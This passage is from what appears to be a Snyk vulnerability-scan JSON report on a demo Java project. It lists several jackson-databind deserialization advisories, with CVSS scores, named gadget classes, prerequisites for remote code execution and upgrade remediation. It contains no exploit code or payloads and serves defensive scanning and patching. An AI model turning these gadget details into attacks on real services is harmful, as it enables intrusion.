attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T14:43:42.115110Z", + "functions_new": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-16T14:37:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T14:37:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:32.899468Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:50.462784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16942" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx7p-6679-8g3q" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:02:18.178548Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.988000Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.814203Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16943" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fmmc-742q-jg75" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:03:39.391997Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.024581Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2460", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:04.701685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", + "epssDetails": { + "percentile": "0.85119", + "probability": "0.01174", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17267" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f3j5-rmmp-3fc5" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-07T10:05:31.629572Z", + "functions_new": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-07T01:14:26Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-07T01:14:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.064844Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Zhangxianhui" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Blog Post" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2498", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:58.282653Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", + "epssDetails": { + "percentile": "0.80301", + "probability": "0.00690", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17531" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-gjmw-vf9h-g25v" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-13T07:40:03.046000Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-12T21:52:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-13T07:41:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.918541Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "UltramanGaia" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + 